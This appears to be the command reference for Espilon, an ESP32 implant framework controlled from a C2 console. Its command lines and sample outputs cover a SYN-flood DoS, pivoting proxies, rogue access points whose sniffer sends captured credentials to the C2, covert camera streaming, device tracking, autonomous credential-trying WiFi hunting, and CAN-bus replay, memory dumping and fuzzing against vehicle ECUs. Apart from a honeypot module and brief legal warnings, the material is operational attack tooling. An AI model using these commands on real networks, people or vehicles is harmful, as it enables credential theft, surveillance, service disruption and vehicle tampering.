Command Reference

Complete reference for all Espilon commands organized by module.

Interactive Help

Type help in the C3PO console to see available commands for connected devices.

---

System Commands

Core system commands available on all devices.

system_info

Get detailed device information including chip, cores, flash type, memory, uptime, and loaded modules.

Usage:

c2:> send <device_id> system_info

Response:

chip=esp32s3 cores=2 flash=external heap=245760 uptime=3600s modules=network,fakeap,camera

Fields:

Field	Description
chip	Target chip (esp32, esp32s3, etc.)
cores	Number of CPU cores
flash	Flash type (embedded/external)
heap	Free heap memory (bytes)
uptime	Device uptime in seconds
modules	Comma-separated list of enabled modules

Left: ESP32 serial output | Right: C2 TUI response

---

system_mem

Get real-time memory statistics.

Usage:

c2:> send <device_id> system_mem

Response:

heap_free=245760 heap_min=180000 internal_free=120000

Fields:

Field	Description
heap_free	Current free heap (bytes)
heap_min	Minimum free heap since boot
internal_free	Internal SRAM available

Left: ESP32 serial output | Right: C2 TUI response

---

system_uptime

Get formatted device uptime.

Usage:

c2:> send <device_id> system_uptime

Response:

uptime=86523 days=1 h=00 m=02 s=03

Left: ESP32 serial output | Right: C2 TUI response

---

system_reboot

Reboot the device.

Usage:

c2:> send <device_id> system_reboot

Connection Lost

Device will disconnect and reconnect after ~30 seconds.

Left: ESP32 serial output | Right: C2 TUI response

---

Network Commands

Network reconnaissance and attack capabilities.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Network Commands

ping <ip>

ICMP ping to check host availability.

Parameters:

Parameter	Description
ip	Target IP address

Usage:

c2:> send <device_id> ping 192.168.1.1

Response:

ping 192.168.1.1 ok rtt=12ms

Left: ESP32 serial output | Right: C2 TUI response

---

arp_scan

Scan local network via ARP requests.

Usage:

c2:> send <device_id> arp_scan

Response:

arp_scan network=192.168.1.0/24 hosts_found=12 scan_time=8.2s

Use Cases:

• Network discovery
• Active host enumeration
• Device inventory

Left: ESP32 serial output | Right: C2 TUI response

---

proxy_start <local_port> <remote_ip> <remote_port>

Start a TCP proxy tunnel.

Parameters:

Parameter	Description
local_port	Local listening port
remote_ip	Remote target IP
remote_port	Remote target port

Usage:

c2:> send <device_id> proxy_start 8080 10.0.0.50 80

Use Cases:

• Pivot through compromised network
• Bypass firewall rules
• Network redirection

Left: ESP32 serial output | Right: C2 TUI response

---

proxy_stop

Stop the running TCP proxy.

Usage:

c2:> send <device_id> proxy_stop

---

dos_tcp <ip> <port>

TCP DoS attack (SYN flood).

Parameters:

Parameter	Description
ip	Target IP address
port	Target port

Usage:

c2:> send <device_id> dos_tcp 192.168.1.100 80

Legal Warning

DoS attacks are illegal without explicit authorization. Use only in authorized testing environments.

Left: ESP32 serial output | Right: C2 TUI response

---

FakeAP Commands

Rogue access point and captive portal attacks.

Legal Warning

Creating rogue access points may be illegal. Only use in authorized testing environments.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Fake Access Point

fakeap_start <ssid>

Start rogue access point with captive portal.

Parameters:

Parameter	Description
ssid	Network name to broadcast

Usage:

c2:> send <device_id> fakeap_start FreeWiFi

Response:

fakeap started ssid=FreeWiFi channel=6 ip=192.168.4.1

Left: ESP32 serial output | Right: C2 TUI response

---

fakeap_stop

Stop rogue access point.

Usage:

c2:> send <device_id> fakeap_stop

---

fakeap_status

Get current FakeAP status.

Usage:

c2:> send <device_id> fakeap_status

Response:

fakeap status=running ssid=FreeWiFi clients=3 uptime=1234s

Left: ESP32 serial output | Right: C2 TUI response

---

fakeap_clients

List connected clients.

Usage:

c2:> send <device_id> fakeap_clients

Response:

clients_count=3
client mac=aa:bb:cc:dd:ee:ff ip=192.168.4.2
client mac=11:22:33:44:55:66 ip=192.168.4.3

Left: ESP32 serial output | Right: C2 TUI response

---

fakeap_portal <type>

Set captive portal type.

Parameters:

Parameter	Description
type	Portal type (login, survey, update, etc.)

Usage:

c2:> send <device_id> fakeap_portal login

---

fakeap_sniffer <start|stop>

Start/stop HTTP traffic sniffer on FakeAP.

Usage:

c2:> send <device_id> fakeap_sniffer start
c2:> send <device_id> fakeap_sniffer stop

Captured credentials will be logged and sent to C2.

Left: ESP32 serial output | Right: C2 TUI response

---

Recon Commands - Camera

ESP32-CAM UDP streaming module.

Hardware Required

Requires ESP32-CAM board with OV2640 camera module.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Recon → Camera Mode

cam_start <ip> <port>

Start UDP camera streaming to C2 server.

Parameters:

Parameter	Description
ip	C2 server IP address
port	UDP port for stream (default: 5000)

Usage:

c2:> send <device_id> cam_start 192.168.1.50 5000

Response:

stream started target=192.168.1.50:5000

Stream Protocol:

1. TOKEN + "START" - Frame start marker
2. TOKEN + <jpeg_chunk> - JPEG data chunks (max 2034 bytes)
3. TOKEN + "END" - Frame end marker

Performance:

• Resolution: QQVGA (160x120)
• Frame rate: ~7 FPS
• Quality: JPEG 20

Left: ESP32 serial output | Right: C2 Web Dashboard with live feed

---

cam_stop

Stop camera streaming.

Usage:

c2:> send <device_id> cam_stop

Response:

stream stopped

Left: ESP32 serial output | Right: C2 TUI response

---

Recon Commands - MLAT

Multilateration (MLAT) for device positioning using RSSI triangulation.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Recon → MLAT Mode

mlat_config <ip> <port>

Configure MLAT server endpoint.

Parameters:

Parameter	Description
ip	C2 server IP address
port	UDP port for MLAT data

Usage:

c2:> send <device_id> mlat_config 192.168.1.50 5001

Response:

mlat configured server=192.168.1.50:5001

Left: ESP32 serial output | Right: C2 TUI response

---

mlat_mode <passive|active>

Set MLAT scanning mode.

Parameters:

Parameter	Description
mode	passive = listen only, active = send probes

Usage:

c2:> send <device_id> mlat_mode passive

Modes:

Mode	Description
passive	Listen for probe requests and beacons
active	Send probe requests to detect devices

Left: ESP32 serial output | Right: C2 TUI response

---

mlat_start

Start MLAT scanning on current channel.

Usage:

c2:> send <device_id> mlat_start

Response:

mlat started channel=6 mode=passive

Data Sent to C2:

rssi mac=aa:bb:cc:dd:ee:ff rssi=-45 channel=6 timestamp=1234567890

Left: ESP32 serial output | Right: C2 Web Dashboard with positioning map

---

mlat_stop

Stop MLAT scanning.

Usage:

c2:> send <device_id> mlat_stop

---

mlat_status

Get current MLAT status.

Usage:

c2:> send <device_id> mlat_status

Response:

mlat status=running mode=passive channel=6 packets=1234

Left: ESP32 serial output | Right: C2 TUI response

---

Red Team Commands

Autonomous WiFi hunting and ESP-NOW mesh relay.

Configuration Required

Enable in menuconfig: Modules → Red Team Module (CONFIG_MODULE_REDTEAM)

rt_hunt

Start autonomous network hunting cycle. Scans for WiFi, attempts known credentials, re-establishes C2. Async.

Usage:

c2:> send <device_id> rt_hunt [profile]

rt_stop

Stop hunt, restore original WiFi/MAC/TX power.

Usage:

c2:> send <device_id> rt_stop

rt_status

Current hunt state, MAC address, method, and config.

Usage:

c2:> send <device_id> rt_status

Response:

state=hunting mac=AA:BB:CC:DD:EE:FF method=passive networks_known=3 mesh=off

rt_scan

One-shot passive WiFi scan. Reports SSIDs, BSSIDs, channels, RSSI. Async.

Usage:

c2:> send <device_id> rt_scan

rt_net_add

Add a known network to the hunt database (NVS persistent).

Usage:

c2:> send <device_id> rt_net_add <ssid> [password]

rt_net_list

List all known networks in the database.

Usage:

c2:> send <device_id> rt_net_list

rt_mesh

Start or stop ESP-NOW mesh relay for multi-hop C2 connectivity.

Usage:

c2:> send <device_id> rt_mesh <start|stop>

---

Honeypot Commands

Fake TCP services and network monitoring.

Configuration Required

Enable in menuconfig: Modules → Honeypot Module (CONFIG_MODULE_HONEYPOT)

hp_svc

Control honeypot services (SSH, Telnet, HTTP, FTP).

Usage:

c2:> send <device_id> hp_svc <service> <start|stop|status>

Services: ssh, telnet, http, ftp

hp_wifi

Start/stop WiFi monitoring (rogue AP detection, deauth detection).

Usage:

c2:> send <device_id> hp_wifi <start|stop>

hp_net

Start/stop network monitoring (ARP spoofing, port scan detection).

Usage:

c2:> send <device_id> hp_net <start|stop>

hp_config_set

Set a honeypot configuration value (banner or threshold).

Usage:

c2:> send <device_id> hp_config_set <type> <key> <value>

Examples:

c2:> send esp001 hp_config_set banner ssh "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3"
c2:> send esp001 hp_config_set threshold scan_rate 10

hp_config_get

Get a specific config value.

Usage:

c2:> send <device_id> hp_config_get <type> <key>

hp_config_list

List all config values.

Usage:

c2:> send <device_id> hp_config_list [type]

hp_config_reset

Reset all config to defaults.

Usage:

c2:> send <device_id> hp_config_reset

hp_status

Overall honeypot status: services, monitors, event counts.

Usage:

c2:> send <device_id> hp_status

Response:

services: ssh=running telnet=stopped http=running ftp=stopped
wifi_monitor=on net_monitor=on
events: ssh_attempts=42 http_requests=15 arp_alerts=3

---

CAN Bus Commands

Automotive CAN bus operations via MCP2515 SPI controller.

Configuration Required

Enable in menuconfig: Modules → CAN Bus Module (MCP2515) (CONFIG_MODULE_CANBUS)

Core

Command	Usage	Async	Description
can_start	can_start [bitrate] [mode]	No	Init MCP2515 (mode: normal/listen/loopback)
can_stop	can_stop	No	Stop CAN bus
can_send	can_send <id_hex> <data_hex>	No	Send single frame
can_filter_add	can_filter_add <id_hex>	No	Add software filter
can_filter_del	can_filter_del <id_hex>	No	Remove filter
can_filter_list	can_filter_list	No	List active filters
can_filter_clear	can_filter_clear	No	Clear all filters
can_status	can_status	No	Bus state and error counters
can_sniff	can_sniff [duration_s]	Yes	Stream frames to C2
can_record	can_record [duration_s]	Yes	Record to ring buffer
can_dump	can_dump	Yes	Send buffer to C2
can_replay	can_replay [speed_pct]	Yes	Replay buffer on bus

UDS Diagnostics (requires CONFIG_CANBUS_UDS)

Command	Usage	Description
can_scan_ecu	can_scan_ecu	Discover ECUs (0x7E0-0x7EF)
can_uds	can_uds <tx_id> <svc_hex> [data]	Raw UDS request
can_uds_session	can_uds_session <tx_id> <type>	DiagnosticSessionControl
can_uds_read	can_uds_read <tx_id> <did_hex>	ReadDataByIdentifier
can_uds_dump	can_uds_dump <tx_id> <addr> <size>	ReadMemoryByAddress
can_uds_auth	can_uds_auth <tx_id> [level]	SecurityAccess seed

OBD-II (requires CONFIG_CANBUS_OBD)

Command	Usage	Description
can_obd	can_obd <pid_hex>	Query single PID (decoded)
can_obd_vin	can_obd_vin	Read VIN
can_obd_dtc	can_obd_dtc	Read trouble codes
can_obd_supported	can_obd_supported	List supported PIDs
can_obd_monitor	can_obd_monitor <pids> [interval]	Stream PIDs to C2
can_obd_monitor_stop	can_obd_monitor_stop	Stop monitoring

Fuzzing (requires CONFIG_CANBUS_FUZZ)

Command	Usage	Description
can_fuzz_id	can_fuzz_id [start] [end] [delay]	ID scan fuzz
can_fuzz_data	can_fuzz_data <id> [seed] [delay]	Data mutation
can_fuzz_random	can_fuzz_random [delay] [count]	Random fuzz
can_fuzz_stop	can_fuzz_stop	Stop fuzzing

---

OTA Commands

Over-the-air firmware updates.

Configuration Required

Enable in menuconfig: Modules → OTA Updates (CONFIG_ESPILON_OTA_ENABLED)

ota_update

Download and apply firmware from HTTPS URL. Async.

Usage:

c2:> send <device_id> ota_update <url>

Progress:

OTA: progress 10%
OTA: progress 20%
...
OTA: image validated, rebooting...

ota_status

Show current firmware info.

Usage:

c2:> send <device_id> ota_status

Response:

running=ota_0 boot=ota_0 version=v2.1.0 idf=v5.3.2

---

C2 Commands

Commands for the C3PO command & control server.

devices

List all connected devices.

Usage:

c2:> devices

Response:

Connected devices (2):
  espilon-demo (192.168.1.100) - uptime: 1h 23m
  espilon-cam1 (192.168.1.101) - uptime: 45m

---

send <device_id> <command> [args...]

Send command to specific device.

Usage:

c2:> send espilon-demo system_info
c2:> send espilon-cam1 cam_start 192.168.1.50 5000

---

broadcast <command> [args...]

Send command to all connected devices.

Usage:

c2:> broadcast system_uptime

---

camera

Start UDP camera receiver.

Usage:

c2:> camera

Starts UDP listener on port 5000 for camera streams.

---

web

Start web dashboard.

Usage:

c2:> web

Starts Flask web server on port 8080.

---

record <start|stop>

Control camera recording.

Usage:

c2:> record start
c2:> record stop

Saves stream to streams/recordings/ directory.

---

help

Show available commands.

Usage:

c2:> help

---

exit / quit

Exit C3PO.

Usage:

c2:> exit

---

Best Practices

Command Timing

• Scanning: Allow 5-10 seconds between large scans
• Camera: Only one device can stream at a time
• MLAT: Position multiple devices around target area for accurate triangulation

Error Handling

Commands may fail with these errors:

Error	Meaning	Solution
TIMEOUT	No response from device	Check device connectivity
INVALID_PARAM	Wrong parameters	Check command syntax
NOT_SUPPORTED	Module not enabled	Enable in menuconfig
ALREADY_RUNNING	Service already active	Stop first, then restart

Performance Tips

1. Memory Management - Monitor heap with system_mem, reboot if low
2. Network Efficiency - Avoid flooding network with scans
3. Camera Bandwidth - UDP streaming uses ~50KB/s at 7 FPS
4. MLAT Accuracy - Use 3+ devices for triangulation, 4+ for better accuracy

---

Previous: Modules Overview | Next: Security